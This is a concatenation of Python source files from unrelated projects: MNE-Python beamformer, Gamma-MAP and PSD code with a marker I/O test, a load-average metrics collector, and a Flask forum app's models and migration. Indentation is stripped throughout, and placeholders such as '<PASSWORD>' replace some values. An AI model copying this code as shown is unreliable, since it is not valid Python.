idx_max = eig_vals.argmax()
max_ori = eig_vecs[:, idx_max]
Wk[:] = np.dot(max_ori, Wk)
Gk = np.dot(Gk, max_ori)
# compute spatial filter for NAI or unit-noise-gain
tmp = np.dot(Gk.T, np.dot(Cm_inv_sq, Gk))
denom = np.sqrt(tmp)
Wk /= denom
if weight_norm == 'nai':
Wk /= np.sqrt(noise)
is_free_ori = False
elif method == 'dics':
# Compute the direction of max power
u, s, _ = np.linalg.svd(power.real)
max_ori = u[:, 0]
Wk[:] = np.dot(max_ori, Wk)
else: # do vector beamformer
if method == 'lcmv':
# compute the filters:
if is_free_ori:
# Free source orientation
Wk[:] = np.dot(linalg.pinv(Ck, 0.1), Wk)
else:
# Fixed source orientation
if not np.all(Ck == 0.):
Wk /= Ck
# handle noise normalization with free/normal source
# orientation:
if weight_norm == 'nai':
raise NotImplementedError('Weight normalization with '
'neural activity index is not '
'implemented yet with free or '
'fixed orientation.')
elif weight_norm == 'unit-noise-gain':
noise_norm = np.sum(Wk ** 2, axis=1, keepdims=True)
if is_free_ori and pick_ori in [None, 'vector']:
# Only do this when we don't select a single
# orientation later. We need to enforce:
# W @ I @ W.T == I
noise_norm = np.sum(noise_norm)
noise_norm = np.sqrt(noise_norm)
if np.all(noise_norm == 0.):
noise_norm_inv = 0. # avoid division by 0
else:
noise_norm_inv = 1. / noise_norm
Wk[:] *= noise_norm_inv
# picking source orientation maximizing output source power
if pick_ori == 'max-power':
W = W[0::3]
elif pick_ori == 'normal':
W = W[2::3]
is_free_ori = False
if method == 'dics':
if weight_norm == 'unit-noise-gain':
# Scale weights so that W @ I @ W.T == I
if pick_ori is None and n_orient > 1:
# Compute the norm for each set of 3 dipoles
W = W.reshape(-1, 3, W.shape[1])
norm = np.sqrt(np.sum(W ** 2, axis=(1, 2)))
W /= norm[:, np.newaxis, np.newaxis]
W = W.reshape(-1, W.shape[2])
else:
# Compute the norm for each dipole
norm = np.sqrt(np.sum(W ** 2, axis=1))
W /= norm[:, np.newaxis]
return W, is_free_ori
class Beamformer(dict):
"""A computed beamformer.
Notes
-----
.. versionadded:: 0.17
"""
def copy(self):
"""Copy the beamformer.
Returns
-------
beamformer : instance of Beamformer
A deep copy of the beamformer.
"""
return deepcopy(self)
def __repr__(self): # noqa: D105
n_verts = sum(len(v) for v in self['vertices'])
n_channels = len(self['ch_names'])
if self['subject'] is None:
subject = 'unknown'
else:
subject = '"%s"' % (self['subject'],)
out = ('<Beamformer | %s, subject %s, %s vert, %s ch'
% (self['kind'], subject, n_verts, n_channels))
if self['pick_ori'] is not None:
out += ', %s ori' % (self['pick_ori'],)
if self['weight_norm'] is not None:
out += ', %s norm' % (self['weight_norm'],)
if self.get('inversion') is not None:
out += ', %s inversion' % (self['inversion'],)
if 'rank' in self:
out += ', rank %s' % (self['rank'],)
out += '>'
return out
@verbose
def save(self, fname, overwrite=False, verbose=None):
"""Save the beamformer filter.
Parameters
----------
fname : str
The filename to use to write the HDF5 data.
Should end in ``'-lcmv.h5'`` or ``'-dics.h5'``.
overwrite : bool
If True, overwrite the file (if it exists).
verbose : bool, str, int, or None
If not None, override default verbose level (see
:func:`mne.verbose` and :ref:`Logging documentation <tut_logging>`
for more).
"""
ending = '-%s.h5' % (self['kind'].lower(),)
check_fname(fname, self['kind'], (ending,))
csd_orig = None
try:
if 'csd' in self:
csd_orig = self['csd']
self['csd'] = self['csd'].__getstate__()
write_hdf5(fname, self, overwrite=overwrite, title='mnepython')
finally:
if csd_orig is not None:
self['csd'] = csd_orig
def read_beamformer(fname):
"""Read a beamformer filter.
Parameters
----------
fname : str
The filename of the HDF5 file.
Returns
-------
filter : instance of Beamformer
The beamformer filter.
"""
beamformer = read_hdf5(fname, title='mnepython')
if 'csd' in beamformer:
beamformer['csd'] = CrossSpectralDensity(**beamformer['csd'])
# h5io seems to cast `bool` to `int` on round-trip, probably a bug
# we should fix at some point (if possible -- could be HDF5 limitation)
for key in ('normalize_fwd', 'is_free_ori', 'is_ssp'):
if key in beamformer:
beamformer[key] = bool(beamformer[key])
for key in ('data_cov', 'noise_cov'):
if beamformer.get(key) is not None:
for pi, p in enumerate(beamformer[key]['projs']):
p = Projection(**p)
p['active'] = bool(p['active'])
beamformer[key]['projs'][pi] = p
beamformer[key] = Covariance(
*[beamformer[key].get(arg)
for arg in ('data', 'names', 'bads', 'projs', 'nfree', 'eig',
'eigvec', 'method', 'loglik')])
return Beamformer(beamformer)
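# --- Illustrative sketch (added, not part of the upstream module) ---
# Hedged round-trip example for Beamformer.save and read_beamformer; the file name is
# hypothetical and `filters` is assumed to be a Beamformer computed elsewhere
# (e.g. with an LCMV solver). The '-lcmv.h5' suffix matches the check in save().
# filters.save('demo-lcmv.h5', overwrite=True)
# filters_2 = read_beamformer('demo-lcmv.h5')
# print(filters_2)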
```
#### File: mne/inverse_sparse/_gamma_map.py
```python
import numpy as np
from scipy import linalg
from ..forward import is_fixed_orient, convert_forward_solution
from ..minimum_norm.inverse import _check_reference
from ..utils import logger, verbose, warn
from ..externals.six.moves import xrange as range
from .mxne_inverse import (_make_sparse_stc, _prepare_gain,
_reapply_source_weighting, _compute_residual,
_make_dipoles_sparse, _check_loose_forward)
@verbose
def _gamma_map_opt(M, G, alpha, maxit=10000, tol=1e-6, update_mode=1,
group_size=1, gammas=None, verbose=None):
"""Hierarchical Bayes (Gamma-MAP).
Parameters
----------
M : array, shape=(n_sensors, n_times)
Observation.
G : array, shape=(n_sensors, n_sources)
Forward operator.
alpha : float
Regularization parameter (noise variance).
maxit : int
Maximum number of iterations.
tol : float
Tolerance parameter for convergence.
group_size : int
Number of consecutive sources which use the same gamma.
update_mode : int
Update mode, 1: MacKay update (default), 2: Modified MacKay update.
gammas : array, shape=(n_sources,)
Initial values for posterior variances (gammas). If None, a
variance of 1.0 is used.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
X : array, shape=(n_active, n_times)
Estimated source time courses.
active_set : array, shape=(n_active,)
Indices of active sources.
"""
G = G.copy()
M = M.copy()
if gammas is None:
gammas = np.ones(G.shape[1], dtype=np.float)
eps = np.finfo(float).eps
n_sources = G.shape[1]
n_sensors, n_times = M.shape
# apply normalization so the numerical values are sane
M_normalize_constant = linalg.norm(np.dot(M, M.T), ord='fro')
M /= np.sqrt(M_normalize_constant)
alpha /= M_normalize_constant
G_normalize_constant = linalg.norm(G, ord=np.inf)
G /= G_normalize_constant
if n_sources % group_size != 0:
raise ValueError('Number of sources has to be evenly dividable by the '
'group size')
n_active = n_sources
active_set = np.arange(n_sources)
gammas_full_old = gammas.copy()
if update_mode == 2:
denom_fun = np.sqrt
else:
# do nothing
def denom_fun(x):
return x
last_size = -1
for itno in range(maxit):
gammas[np.isnan(gammas)] = 0.0
gidx = (np.abs(gammas) > eps)
active_set = active_set[gidx]
gammas = gammas[gidx]
# update only active gammas (once set to zero it stays at zero)
if n_active > len(active_set):
n_active = active_set.size
G = G[:, gidx]
CM = np.dot(G * gammas[np.newaxis, :], G.T)
CM.flat[::n_sensors + 1] += alpha
# Invert CM keeping symmetry
U, S, V = linalg.svd(CM, full_matrices=False)
S = S[np.newaxis, :]
CM = np.dot(U * S, U.T)
CMinv = np.dot(U / (S + eps), U.T)
CMinvG = np.dot(CMinv, G)
A = np.dot(CMinvG.T, M) # mult. w. Diag(gamma) in gamma update
if update_mode == 1:
# MacKay fixed point update (10) in [1]
numer = gammas ** 2 * np.mean((A * A.conj()).real, axis=1)
denom = gammas * np.sum(G * CMinvG, axis=0)
elif update_mode == 2:
# modified MacKay fixed point update (11) in [1]
numer = gammas * np.sqrt(np.mean((A * A.conj()).real, axis=1))
denom = np.sum(G * CMinvG, axis=0) # sqrt is applied below
else:
raise ValueError('Invalid value for update_mode')
if group_size == 1:
if denom is None:
gammas = numer
else:
gammas = numer / np.maximum(denom_fun(denom),
np.finfo('float').eps)
else:
numer_comb = np.sum(numer.reshape(-1, group_size), axis=1)
if denom is None:
gammas_comb = numer_comb
else:
denom_comb = np.sum(denom.reshape(-1, group_size), axis=1)
gammas_comb = numer_comb / denom_fun(denom_comb)
gammas = np.repeat(gammas_comb / group_size, group_size)
# compute convergence criterion
gammas_full = np.zeros(n_sources, dtype=np.float)
gammas_full[active_set] = gammas
err = (np.sum(np.abs(gammas_full - gammas_full_old)) /
np.sum(np.abs(gammas_full_old)))
gammas_full_old = gammas_full
breaking = (err < tol or n_active == 0)
if len(gammas) != last_size or breaking:
logger.info('Iteration: %d\t active set size: %d\t convergence: '
'%0.3e' % (itno, len(gammas), err))
last_size = len(gammas)
if breaking:
break
if itno < maxit - 1:
logger.info('\nConvergence reached !\n')
else:
warn('\nConvergence NOT reached !\n')
# undo normalization and compute final posterior mean
n_const = np.sqrt(M_normalize_constant) / G_normalize_constant
x_active = n_const * gammas[:, None] * A
return x_active, active_set
@verbose
def gamma_map(evoked, forward, noise_cov, alpha, loose="auto", depth=0.8,
xyz_same_gamma=True, maxit=10000, tol=1e-6, update_mode=1,
gammas=None, pca=True, return_residual=False,
return_as_dipoles=False, verbose=None):
"""Hierarchical Bayes (Gamma-MAP) sparse source localization method.
Models each source time course using a zero-mean Gaussian prior with an
unknown variance (gamma) parameter. During estimation, most gammas are
driven to zero, resulting in a sparse source estimate, as in
[1]_ and [2]_.
For fixed-orientation forward operators, a separate gamma is used for each
source time course, while for free-orientation forward operators, the same
gamma is used for the three source time courses at each source space point
(separate gammas can be used in this case by using xyz_same_gamma=False).
Parameters
----------
evoked : instance of Evoked
Evoked data to invert.
forward : dict
Forward operator.
noise_cov : instance of Covariance
Noise covariance to compute whitener.
alpha : float
Regularization parameter (noise variance).
loose : float in [0, 1] | 'auto'
Value that weights the source variances of the dipole components
that are parallel (tangential) to the cortical surface. If loose
is 0 then the solution is computed with fixed orientation.
If loose is 1, it corresponds to free orientations.
The default value ('auto') is set to 0.2 for surface-oriented source
space and set to 1.0 for volumic or discrete source space.
depth : None | float in [0, 1]
Depth weighting coefficients. If None, no depth weighting is performed.
xyz_same_gamma : bool
Use same gamma for xyz current components at each source space point.
Recommended for free-orientation forward solutions.
maxit : int
Maximum number of iterations.
tol : float
Tolerance parameter for convergence.
update_mode : int
Update mode, 1: MacKay update (default), 2: Modified MacKay update.
gammas : array, shape=(n_sources,)
Initial values for posterior variances (gammas). If None, a
variance of 1.0 is used.
pca : bool
If True the rank of the data is reduced to the true dimension.
return_residual : bool
If True, the residual is returned as an Evoked instance.
return_as_dipoles : bool
If True, the sources are returned as a list of Dipole instances.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
stc : instance of SourceEstimate
Source time courses.
residual : instance of Evoked
The residual a.k.a. data not explained by the sources.
Only returned if return_residual is True.
References
----------
.. [1] Wipf et al. Analysis of Empirical Bayesian Methods for
Neuroelectromagnetic Source Localization, Advances in Neural
Information Process. Systems (2007)
.. [2] <NAME>, <NAME>
"A unified Bayesian framework for MEG/EEG source imaging",
Neuroimage, Volume 44, Number 3, pp. 947-966, Feb. 2009.
DOI: 10.1016/j.neuroimage.2008.02.059
"""
_check_reference(evoked)
loose, forward = _check_loose_forward(loose, forward)
# make forward solution in fixed orientation if necessary
if loose == 0. and not is_fixed_orient(forward):
forward = convert_forward_solution(
forward, surf_ori=True, force_fixed=True, copy=True, use_cps=True)
if is_fixed_orient(forward) or not xyz_same_gamma:
group_size = 1
else:
group_size = 3
gain, gain_info, whitener, source_weighting, mask = _prepare_gain(
forward, evoked.info, noise_cov, pca, depth, loose, None, None)
# get the data
sel = [evoked.ch_names.index(name) for name in gain_info['ch_names']]
M = evoked.data[sel]
# whiten the data
logger.info('Whitening data matrix.')
M = np.dot(whitener, M)
# run the optimization
X, active_set = _gamma_map_opt(M, gain, alpha, maxit=maxit, tol=tol,
update_mode=update_mode, gammas=gammas,
group_size=group_size, verbose=verbose)
if len(active_set) == 0:
raise Exception("No active dipoles found. alpha is too big.")
# Compute estimated whitened sensor data
M_estimated = np.dot(gain[:, active_set], X)
# Reapply weights to have correct unit
X = _reapply_source_weighting(X, source_weighting, active_set)
if return_residual:
residual = _compute_residual(forward, evoked, X, active_set,
gain_info)
if group_size == 1 and not is_fixed_orient(forward):
# make sure each source has 3 components
active_src = np.unique(active_set // 3)
in_pos = 0
if len(X) < 3 * len(active_src):
X_xyz = np.zeros((3 * len(active_src), X.shape[1]), dtype=X.dtype)
for ii in range(len(active_src)):
for jj in range(3):
if in_pos >= len(active_set):
break
if (active_set[in_pos] + jj) % 3 == 0:
X_xyz[3 * ii + jj] = X[in_pos]
in_pos += 1
X = X_xyz
tmin = evoked.times[0]
tstep = 1.0 / evoked.info['sfreq']
if return_as_dipoles:
out = _make_dipoles_sparse(X, active_set, forward, tmin, tstep, M,
M_estimated, active_is_idx=True)
else:
out = _make_sparse_stc(X, active_set, forward, tmin, tstep,
active_is_idx=True, verbose=verbose)
logger.info('[done]')
if return_residual:
out = out, residual
return out
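# --- Illustrative sketch (added, not part of the upstream module) ---
# Hedged example call of gamma_map; `evoked`, `forward` and `noise_cov` are assumed to
# be already-loaded MNE objects, and alpha=0.5 is a made-up regularization level.
# stc, residual = gamma_map(evoked, forward, noise_cov, alpha=0.5, return_residual=True)
# print(stc)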
```
#### File: kit/tests/test_coreg.py
```python
import inspect
import os
from mne.externals.six.moves import cPickle as pickle
import pytest
from numpy.testing import assert_array_equal
from mne.io.kit import read_mrk
from mne.io.meas_info import _write_dig_points
from mne.utils import _TempDir
FILE = inspect.getfile(inspect.currentframe())
parent_dir = os.path.dirname(os.path.abspath(FILE))
data_dir = os.path.join(parent_dir, 'data')
mrk_fname = os.path.join(data_dir, 'test_mrk.sqd')
def test_io_mrk():
"""Test IO for mrk files."""
tempdir = _TempDir()
pts = read_mrk(mrk_fname)
# txt
path = os.path.join(tempdir, 'mrk.txt')
_write_dig_points(path, pts)
pts_2 = read_mrk(path)
assert_array_equal(pts, pts_2, "read/write mrk to text")
# pickle
fname = os.path.join(tempdir, 'mrk.pickled')
with open(fname, 'wb') as fid:
pickle.dump(dict(mrk=pts), fid)
pts_2 = read_mrk(fname)
assert_array_equal(pts_2, pts, "pickle mrk")
with open(fname, 'wb') as fid:
pickle.dump(dict(), fid)
pytest.raises(ValueError, read_mrk, fname)
# unsupported extension
pytest.raises(ValueError, read_mrk, "file.ext")
```
#### File: mne/time_frequency/psd.py
```python
import numpy as np
from ..parallel import parallel_func
from ..io.pick import _pick_data_channels
from ..utils import logger, verbose, _time_mask
from ..fixes import get_spectrogram
from .multitaper import psd_array_multitaper
def _psd_func(epoch, noverlap, n_per_seg, nfft, fs, freq_mask, func):
"""Aux function."""
return func(epoch, fs=fs, nperseg=n_per_seg, noverlap=noverlap,
nfft=nfft, window='hamming')[2][..., freq_mask, :]
def _check_nfft(n, n_fft, n_per_seg, n_overlap):
"""Ensure n_fft, n_per_seg and n_overlap make sense."""
if n_per_seg is None and n_fft > n:
raise ValueError(('If n_per_seg is None n_fft is not allowed to be > '
'n_times. If you want zero-padding, you have to set '
'n_per_seg to relevant length. Got n_fft of %d while'
' signal length is %d.') % (n_fft, n))
n_per_seg = n_fft if n_per_seg is None or n_per_seg > n_fft else n_per_seg
n_per_seg = n if n_per_seg > n else n_per_seg
if n_overlap >= n_per_seg:
raise ValueError(('n_overlap cannot be greater than n_per_seg (or '
'n_fft). Got n_overlap of %d while n_per_seg is '
'%d.') % (n_overlap, n_per_seg))
return n_fft, n_per_seg, n_overlap
def _check_psd_data(inst, tmin, tmax, picks, proj, reject_by_annotation=False):
"""Check PSD data / pull arrays from inst."""
from ..io.base import BaseRaw
from ..epochs import BaseEpochs
from ..evoked import Evoked
if not isinstance(inst, (BaseEpochs, BaseRaw, Evoked)):
raise ValueError('epochs must be an instance of Epochs, Raw, or '
'Evoked. Got type {0}'.format(type(inst)))
time_mask = _time_mask(inst.times, tmin, tmax, sfreq=inst.info['sfreq'])
if picks is None:
picks = _pick_data_channels(inst.info, with_ref_meg=False)
if proj:
# Copy first so it's not modified
inst = inst.copy().apply_proj()
sfreq = inst.info['sfreq']
if isinstance(inst, BaseRaw):
start, stop = np.where(time_mask)[0][[0, -1]]
rba = 'NaN' if reject_by_annotation else None
data = inst.get_data(picks, start, stop + 1, reject_by_annotation=rba)
elif isinstance(inst, BaseEpochs):
data = inst.get_data()[:, picks][:, :, time_mask]
else: # Evoked
data = inst.data[picks][:, time_mask]
return data, sfreq
@verbose
def psd_array_welch(x, sfreq, fmin=0, fmax=np.inf, n_fft=256, n_overlap=0,
n_per_seg=None, n_jobs=1, verbose=None):
"""Compute power spectral density (PSD) using Welch's method.
Parameters
----------
x : array, shape=(..., n_times)
The data to compute PSD from.
sfreq : float
The sampling frequency.
fmin : float
The lower frequency of interest.
fmax : float
The upper frequency of interest.
n_fft : int
The length of FFT used, must be ``>= n_per_seg`` (default: 256).
The segments will be zero-padded if ``n_fft > n_per_seg``.
n_overlap : int
The number of points of overlap between segments. Will be adjusted
to be <= n_per_seg. The default value is 0.
n_per_seg : int | None
Length of each Welch segment (windowed with a Hamming window). Defaults
to None, which sets n_per_seg equal to n_fft.
n_jobs : int
Number of CPUs to use in the computation.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
psds : ndarray, shape (..., n_freqs)
The power spectral densities. All dimensions up to the last will
be the same as input.
freqs : ndarray, shape (n_freqs,)
The frequencies.
Notes
-----
.. versionadded:: 0.14.0
"""
spectrogram = get_spectrogram()
dshape = x.shape[:-1]
n_times = x.shape[-1]
x = x.reshape(-1, n_times)
# Prep the PSD
n_fft, n_per_seg, n_overlap = _check_nfft(n_times, n_fft, n_per_seg,
n_overlap)
win_size = n_fft / float(sfreq)
logger.info("Effective window size : %0.3f (s)" % win_size)
freqs = np.arange(n_fft // 2 + 1, dtype=float) * (sfreq / n_fft)
freq_mask = (freqs >= fmin) & (freqs <= fmax)
freqs = freqs[freq_mask]
# Parallelize across first N-1 dimensions
parallel, my_psd_func, n_jobs = parallel_func(_psd_func, n_jobs=n_jobs)
x_splits = np.array_split(x, n_jobs)
f_spectrogram = parallel(my_psd_func(d, noverlap=n_overlap, nfft=n_fft,
fs=sfreq, freq_mask=freq_mask,
func=spectrogram, n_per_seg=n_per_seg)
for d in x_splits)
# Combining, reducing windows and reshaping to original data shape
psds = np.concatenate([np.nanmean(f_s, axis=-1)
for f_s in f_spectrogram], axis=0)
psds.shape = dshape + (-1,)
return psds, freqs
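# --- Illustrative sketch (added, not part of the upstream module) ---
# Hedged example of psd_array_welch on a raw ndarray: `data` is assumed to be a
# (n_channels, n_times) array sampled at 1000 Hz with more than n_fft samples; the
# result keeps all leading dimensions and appends a frequency axis.
# psds, freqs = psd_array_welch(data, sfreq=1000., fmin=1., fmax=40., n_fft=2048, n_overlap=1024)
# print(psds.shape, freqs[:5])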
@verbose
def psd_welch(inst, fmin=0, fmax=np.inf, tmin=None, tmax=None, n_fft=256,
n_overlap=0, n_per_seg=None, picks=None, proj=False, n_jobs=1,
reject_by_annotation=True, verbose=None):
"""Compute the power spectral density (PSD) using Welch's method.
Calculates periodograms for a sliding window over the time dimension, then
averages them together for each channel/epoch.
Parameters
----------
inst : instance of Epochs or Raw or Evoked
The data for PSD calculation
fmin : float
Min frequency of interest
fmax : float
Max frequency of interest
tmin : float | None
Min time of interest
tmax : float | None
Max time of interest
n_fft : int
The length of FFT used, must be ``>= n_per_seg`` (default: 256).
The segments will be zero-padded if ``n_fft > n_per_seg``.
If n_per_seg is None, n_fft must be >= number of time points
in the data.
n_overlap : int
The number of points of overlap between segments. Will be adjusted
to be <= n_per_seg. The default value is 0.
n_per_seg : int | None
Length of each Welch segment (windowed with a Hamming window). Defaults
to None, which sets n_per_seg equal to n_fft.
picks : array-like of int | None
The selection of channels to include in the computation.
If None, take all channels.
proj : bool
Apply SSP projection vectors. If inst is ndarray this is not used.
n_jobs : int
Number of CPUs to use in the computation.
reject_by_annotation : bool
Whether to omit bad segments from the data while computing the
PSD. If True, annotated segments with a description that starts
with 'bad' are omitted. Has no effect if ``inst`` is an Epochs or
Evoked object. Defaults to True.
.. versionadded:: 0.15.0
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
psds : ndarray, shape (..., n_freqs)
The power spectral densities. If input is of type Raw,
then psds will be shape (n_channels, n_freqs), if input is type Epochs
then psds will be shape (n_epochs, n_channels, n_freqs).
freqs : ndarray, shape (n_freqs,)
The frequencies.
See Also
--------
mne.io.Raw.plot_psd
mne.Epochs.plot_psd
psd_multitaper
psd_array_welch
Notes
-----
.. versionadded:: 0.12.0
"""
# Prep data
data, sfreq = _check_psd_data(inst, tmin, tmax, picks, proj,
reject_by_annotation=reject_by_annotation)
return psd_array_welch(data, sfreq, fmin=fmin, fmax=fmax, n_fft=n_fft,
n_overlap=n_overlap, n_per_seg=n_per_seg,
n_jobs=n_jobs, verbose=verbose)
@verbose
def psd_multitaper(inst, fmin=0, fmax=np.inf, tmin=None, tmax=None,
bandwidth=None, adaptive=False, low_bias=True,
normalization='length', picks=None, proj=False,
n_jobs=1, verbose=None):
"""Compute the power spectral density (PSD) using multitapers.
Calculates spectral density for orthogonal tapers, then averages them
together for each channel/epoch. See [1] for a description of the tapers
and [2] for the general method.
Parameters
----------
inst : instance of Epochs or Raw or Evoked
The data for PSD calculation.
fmin : float
        Min frequency of interest.
    fmax : float
        Max frequency of interest.
    tmin : float | None
        Min time of interest.
    tmax : float | None
        Max time of interest.
    bandwidth : float
        The bandwidth of the multitaper windowing function in Hz. The default
        value is a window half-bandwidth of 4.
adaptive : bool
Use adaptive weights to combine the tapered spectra into PSD
(slow, use n_jobs >> 1 to speed up computation).
low_bias : bool
Only use tapers with more than 90% spectral concentration within
bandwidth.
normalization : str
Either "full" or "length" (default). If "full", the PSD will
be normalized by the sampling rate as well as the length of
the signal (as in nitime).
picks : array-like of int | None
The selection of channels to include in the computation.
If None, take all channels.
proj : bool
Apply SSP projection vectors. If inst is ndarray this is not used.
n_jobs : int
Number of CPUs to use in the computation.
verbose : bool, str, int, or None
If not None, override default verbose level (see :func:`mne.verbose`
and :ref:`Logging documentation <tut_logging>` for more).
Returns
-------
psds : ndarray, shape (..., n_freqs)
The power spectral densities. If input is of type Raw,
then psds will be shape (n_channels, n_freqs), if input is type Epochs
then psds will be shape (n_epochs, n_channels, n_freqs).
freqs : ndarray, shape (n_freqs,)
The frequencies.
References
----------
.. [1] <NAME>. "Prolate spheroidal wave functions, Fourier analysis,
and uncertainty V: The discrete case." Bell System Technical
Journal, vol. 57, 1978.
.. [2] <NAME>. and <NAME>. "Spectral Analysis for Physical
Applications: Multitaper and Conventional Univariate Techniques."
Cambridge University Press, 1993.
See Also
--------
mne.io.Raw.plot_psd
mne.Epochs.plot_psd
psd_array_multitaper
psd_welch
csd_multitaper
Notes
-----
.. versionadded:: 0.12.0
"""
# Prep data
data, sfreq = _check_psd_data(inst, tmin, tmax, picks, proj)
return psd_array_multitaper(data, sfreq, fmin=fmin, fmax=fmax,
bandwidth=bandwidth, adaptive=adaptive,
low_bias=low_bias, normalization=normalization,
n_jobs=n_jobs, verbose=verbose)
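def _example_psd_multitaper(epochs):
    # Minimal usage sketch, assuming ``epochs`` is an mne.Epochs instance; the
    # frequency band and bandwidth value are illustrative assumptions.
    psds, freqs = psd_multitaper(epochs, fmin=1., fmax=40., bandwidth=4.)
    return psds, freqs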
``` |
{
"source": "jnvilo/sensesagent",
"score": 2
} |
#### File: sensesagent/collectors/LoadAverageCollector.py
```python
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from future.utils import raise_
from future.utils import raise_with_traceback
from future.utils import raise_from
from future.utils import iteritems
import os
import logging
import psutil
from multiprocessing import cpu_count
from sensesagent.collectors.collector import Collector
class LoadAverageCollector(Collector):
"""
    Collects the system load average. This collector exposes the following metrics:
load_1_minute - The 1 minute load average
load_5_minute - The 5 minute load average
load_15_minute - The 15 minute load average
"""
def collect_metrics(self):
"""Implements gathering the metrics and filling up our
metrics object
"""
load_1_minute, load_5_minute, load_15_minute = os.getloadavg()
cpu_percent = psutil.cpu_percent()
self.add_metric("load_1_minute", load_1_minute)
self.add_metric("load_5_minute", load_5_minute)
self.add_metric("load_15_minute", load_15_minute)
if __name__ == "__main__":
lac = LoadAverageCollector()
for key in lac.metrics.keys():
print(key)
```
#### File: sensesagent/tests/SystemStatsCollector_tests.py
```python
import unittest
import os
import simplejson as json
from pathlib import Path
from sensesagent.collectors.loadaverage import SystemStatsCollector
from sensesagent import log
class SystemStatsCollectorTests(unittest.TestCase):
def setUp(self):
#The config path is one directory above us.
dir_path = os.path.dirname(os.path.realpath(__file__))
parent_path = Path(dir_path).parent
template_path = Path(parent_path, "conf/collector_templates/LoadAverageCollector.template")
self.lac = SystemStatsCollector(template_path=template_path.as_posix())
def test_can_process_template(self):
json_str = self.lac.process_template()
print(json_str)
def test_metric(self):
pass
def test_json(self):
x = json.loads(self.lac.json)
print(x)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jnwanya/online-forum-flask-api",
"score": 2
} |
#### File: app/main/__init__.py
```python
from flask import Flask
from flask_bcrypt import Bcrypt
from flask_sqlalchemy import SQLAlchemy
from flask_jwt_extended import JWTManager
from .config import config_by_name
db = SQLAlchemy()
bcrypt = Bcrypt()
jwt = JWTManager()
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config_by_name[config_name])
jwt.init_app(app)
db.init_app(app)
bcrypt.init_app(app)
return app
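# Minimal usage sketch, assuming config_by_name defines a 'dev' entry:
#     app = create_app('dev')
#     app.run(debug=True)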
```
#### File: main/model/post.py
```python
from .audit_base import AuditModel
from .post_category import PostCategory
from .user import User
from .. import db
class Post(db.Model, AuditModel):
__tablename__ = 'post'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
title = db.Column(db.String(255), nullable=False)
content = db.Column(db.Text, nullable=False)
view_count = db.Column(db.Integer, default=0)
category_id = db.Column(db.Integer, db.ForeignKey('post_category.id'), nullable=False)
category = db.relationship('PostCategory')
creator_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
creator = db.relationship('User')
def __init__(self, title: str, content: str, category: PostCategory, creator: User):
self.title = title
self.content = content
self.category = category
self.creator = creator
def __repr__(self):
return f"<Post({self.id}, {self.title})>"
def save(self):
db.session.add(self)
db.session.commit()
@classmethod
def find_title_and_category(cls, title: str, category: PostCategory) -> 'Post':
        return Post.query.filter(Post.title.ilike(title), Post.category_id == category.id).first()
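# Minimal usage sketch, assuming a PostCategory and a User are already persisted;
# the title, body, and variable names are illustrative only:
#     post = Post('Hello', 'First post body', category=some_category, creator=some_user)
#     post.save()
#     match = Post.find_title_and_category('Hello', some_category)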
```
#### File: main/service/bootloader.py
```python
from ..model.role import Role, RoleConstant
from ..model.post_category import PostCategory
class BootLoader:
__category_list = [
{'name': 'General', 'description': 'For all general posting'},
{'name': 'Politics', 'description': 'For issues and discussion related to politics'},
{'name': 'Career', 'description': 'For description about careers and job opportunities'},
{'name': 'Entertainers', 'description': 'For funny and entertaining post. be it music, jokes, comedy'},
]
@classmethod
def __create_roles(cls):
role_list = [name for name in dir(RoleConstant) if not name.startswith('_')]
for role_name in role_list:
if not Role.find_by_name(role_name):
role = Role(role_name)
role.save()
@classmethod
def __create_post_categories(cls):
for category in cls.__category_list:
print(category)
if not PostCategory.find_by_name(category['name']):
post_category = PostCategory(**category)
post_category.save()
@classmethod
def setup_app_data(cls):
cls.__create_roles()
cls.__create_post_categories()
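# Minimal usage sketch, assuming it is called once at startup inside a Flask
# application context so the models above can reach the database:
#     with app.app_context():
#         BootLoader.setup_app_data()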
```
#### File: migrations/versions/7a61c334127c_added_post_view_model.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '7a61c334127c'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('post_category',
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('name', sa.String(length=150), nullable=False),
sa.Column('description', sa.Text(), nullable=True),
sa.Column('status', sa.String(length=25), nullable=False),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('post',
sa.Column('created', sa.DateTime(), nullable=False),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('title', sa.String(length=255), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('view_count', sa.Integer(), nullable=True),
sa.Column('category_id', sa.Integer(), nullable=False),
sa.Column('creator_id', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['category_id'], ['post_category.id'], ),
sa.ForeignKeyConstraint(['creator_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('comment',
sa.Column('created', sa.DateTime(), nullable=False),
sa.Column('updated', sa.DateTime(), nullable=True),
sa.Column('id', sa.Integer(), autoincrement=True, nullable=False),
sa.Column('status', sa.String(length=25), nullable=False),
sa.Column('content', sa.Text(), nullable=False),
sa.Column('post_id', sa.Integer(), nullable=False),
sa.Column('posted_by_id', sa.Integer(), nullable=False),
sa.Column('replied_comment_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['post_id'], ['post.id'], ),
sa.ForeignKeyConstraint(['posted_by_id'], ['user.id'], ),
sa.ForeignKeyConstraint(['replied_comment_id'], ['comment.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('post_like',
sa.Column('created', sa.DateTime(), nullable=False),
